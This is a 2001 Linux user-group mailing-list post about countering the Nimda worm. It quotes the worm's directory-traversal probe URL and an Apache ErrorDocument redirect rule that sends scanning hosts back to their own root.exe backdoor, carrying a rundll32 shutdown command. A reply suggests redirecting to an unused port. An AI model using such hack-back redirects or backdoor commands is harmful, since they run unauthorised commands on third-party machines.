[NTLUG:Discuss] Possible new nimda counter-attack.

asenec@senechalle.net asenec at senechalle.net
Wed Oct 10 12:14:47 CDT 2001 

Send them to http://:81 or some other non-used port.

That will save you some traffic.

Annette

> From discuss-admin at ntlug.org Wed Oct 10 11:28 CDT 2001
> From: "Richard Geoffrion" <ntlug at rain.lewisville.tx.us>
> To: <discuss at ntlug.org>
> MIME-Version: 1.0
> Content-Transfer-Encoding: 7bit
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
> Subject: [NTLUG:Discuss] Possible new nimda counter-attack.
> X-BeenThere: discuss at ntlug.org
> X-Mailman-Version: 2.0.3
> List-Help: <mailto:discuss-request at ntlug.org?subject=help>
> List-Post: <mailto:discuss at ntlug.org>
> List-Subscribe: <http://www.ntlug.org/mailman/listinfo/discuss>,
> 	<mailto:discuss-request at ntlug.org?subject=subscribe>
> List-Id: NTLUG Discussion List <discuss.ntlug.org>
> List-Unsubscribe: <http://www.ntlug.org/mailman/listinfo/discuss>,
> 	<mailto:discuss-request at ntlug.org?subject=unsubscribe>
> List-Archive: <http://www.ntlug.org/pipermail/discuss/>
> Date: Wed, 10 Oct 2001 11:25:25 -0500
> 
> While researching possible means to counter attack this dang microsoft.nimda
> virus, I discovered that..
> 
> a)  I can't use high ascii characters in linux directory names.
> b)  I can't create a wildcard directory on the reiserfs that would accept
> input from any md command
>     (ie:  mkdir * would then be accessible by cd wombat  or cd nonimda -OR-
> in this case "cd scripts")
> 
> But I DID discover something..... EXTERNAL REDIRECTS!  I tested this and
> redirected the URL
> http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
> to yahoo.com!  Now of course I don't want to go around sending people to
> other websites......hm....just had a thought!  Maybe I DO want to redirect
> them somewhere!?!?  Maybe I could redirect them to the BIGGEST webpage that
> Microsoft has published....anybody know of a good one?
> 
> But I digress....
> 
> Here is what I added to my httpd.conf file.
> 
> # External Redirect of a nimda scan
> <Location /scripts/*/winnt/system32/*>
>     Deny from all
>     ErrorDocument 403
> http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> owsEx+5", "r"
> #    ErrorDocument 403 http://www.yahoo.com
> </Location>
> 
> Since I know that this redirect in and of itself works, my question has to
> do with the syntax of the http string.  Can anyone tell me if this is
> correct or help me with the syntax?  I only want to do my part!
> 
> 
> 
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>

More information about the Discuss mailing list